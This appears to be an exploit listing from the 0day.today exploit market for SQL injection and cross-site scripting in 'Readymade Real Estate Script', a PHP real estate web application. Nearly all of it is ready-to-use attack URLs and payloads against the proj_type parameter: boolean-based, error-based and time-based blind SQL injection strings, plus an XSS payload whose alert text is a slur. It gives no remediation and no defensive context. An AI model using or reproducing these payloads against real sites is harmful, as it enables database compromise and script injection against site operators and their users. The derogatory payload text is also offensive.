[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Readymade Real Estate Script SQL Injection / Cross Site Scripting Vulnerabilities

Author
OoN_Boy
Risk
[
Security Risk High
]
0day-ID
0day-ID-39691
Category
web applications
Date add
31-07-2024
Platform
php
[x]========================================================================================================================================[x]
 | Title        : Readymade Real Estate Script Blind SQL & XSS Vulnerabilities
 | Software     : Advanced Real Estate Script
 | Vendor       : http://www.i-netsolution.com/
 | Date         : 30 Agustus 2024
 | Author       : OoN_Boy
[x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database         : MySQL
 | Price            : $100
 | Description      : The real estate market is full of interesting business opportunities. A few years back, it can be said that this industry is hardly responsive to innovation
[x]========================================================================================================================================[x]

[O] Exploit
  
  http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[SQL]&search=r00t&searchtext=&sell_price=111
  http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[XSS]&search=r00t&searchtext=&sell_price=111
    
[O] Proof of concept

  [SQL]
  Parameter: proj_type (GET)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
  Payload: Projectmain=&proj_type=%' OR NOT 7852=7852#&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t

  Type: error-based  
  Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
  Payload: Projectmain=&proj_type=%' AND GTID_SUBSET(CONCAT(0x7162706a71,(SELECT (ELT(7736=7736,1))),0x7178717871),7736) AND 'jCym%'='jCym&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: Projectmain=&proj_type=%' AND (SELECT 6632 FROM (SELECT(SLEEP(5)))NRLb) AND 'IbJm%'='IbJm&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t

  
  [XSS]  
  http://localhost/advance-realestate/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type='"><img/src/onerror=.1|alert`HOMODETECTED!!!`+class=VrsHckHomo>&search=r00t&searchtext=&sell_price=111

#  0day.today [2024-09-19]  #